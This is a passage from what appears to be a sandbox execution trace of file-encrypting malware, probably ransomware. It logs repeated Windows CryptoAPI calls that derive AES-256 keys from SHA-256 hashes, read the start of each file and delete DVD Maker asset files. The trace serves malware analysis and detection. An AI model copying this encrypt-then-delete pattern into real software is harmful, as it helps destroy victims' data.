CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.734] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.734] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.734] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.734] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dd2a [0144.734] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.810] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.810] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.810] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.812] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv")) returned 0 [0144.816] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.817] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.817] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.817] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.817] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3fc64 [0144.817] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.886] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.886] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.886] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.888] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv")) returned 0 [0144.888] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.890] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.890] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.890] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.890] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2a8a [0144.890] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.185] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.185] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.185] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.186] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv")) returned 0 [0145.186] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.187] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.187] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.187] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.187] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd43ca [0145.187] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.258] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.258] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.258] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.260] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv")) returned 0 [0145.260] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.261] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.261] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.261] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.261] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe3dca [0145.261] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.515] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.515] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.515] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.516] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv")) returned 0 [0145.559] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.559] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.559] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.559] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.559] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf188a [0145.560] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.660] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.660] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.660] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.662] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv")) returned 0 [0145.662] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.663] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.663] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.663] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.663] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14fc [0145.663] ReadFile (in: hFile=0x43c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.666] CryptDestroyHash (hHash=0x284d668) returned 1 [0145.666] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.666] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.668] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png")) returned 0 [0145.669] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.669] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.669] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.669] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.669] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1274 [0145.670] ReadFile (in: hFile=0x438, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.672] CryptDestroyHash (hHash=0x284d568) returned 1 [0145.672] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.672] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.674] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png")) returned 0 [0145.678] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.678] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.678] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.678] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.679] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1266 [0145.679] ReadFile (in: hFile=0x43c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.681] CryptDestroyHash (hHash=0x284d668) returned 1 [0145.681] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.681] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.682] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png")) returned 0 [0145.717] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.718] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.718] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.718] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.718] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x59b9 [0145.718] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.721] CryptDestroyHash (hHash=0x284d568) returned 1 [0145.721] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.721] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.723] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png")) returned 0 [0145.723] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.724] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.724] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.724] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.724] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x160f [0145.724] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.727] CryptDestroyHash (hHash=0x284d668) returned 1 [0145.727] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.727] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.728] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png")) returned 0 [0145.762] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0145.762] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0145.762] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.762] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0145.762] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc8e [0145.762] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0145.764] CryptDestroyHash (hHash=0x284d568) returned 1 [0145.764] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0145.764] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0145.766] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png")) returned 0 [0145.767] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0145.767] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.768] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.768] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.768] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.768] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0145.768] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.772] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.772] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.772] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.773] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png")) returned 0 [0145.773] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.773] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.774] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.774] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.774] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0145.774] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.776] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.776] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.776] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.778] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png")) returned 0 [0145.778] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.779] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.779] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.779] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.779] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0145.779] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.781] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.781] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.781] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.783] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png")) returned 0 [0145.783] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.783] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.783] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.783] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.784] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0145.784] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.786] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.786] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.786] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.787] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png")) returned 0 [0145.787] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.788] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.788] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.788] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.788] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0145.788] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.790] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.791] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.791] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.792] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png")) returned 0 [0145.792] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.793] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.793] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.793] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.793] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0145.793] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.807] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.807] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.807] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.809] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png")) returned 0 [0145.809] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.809] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.809] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.810] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.810] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0145.810] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, 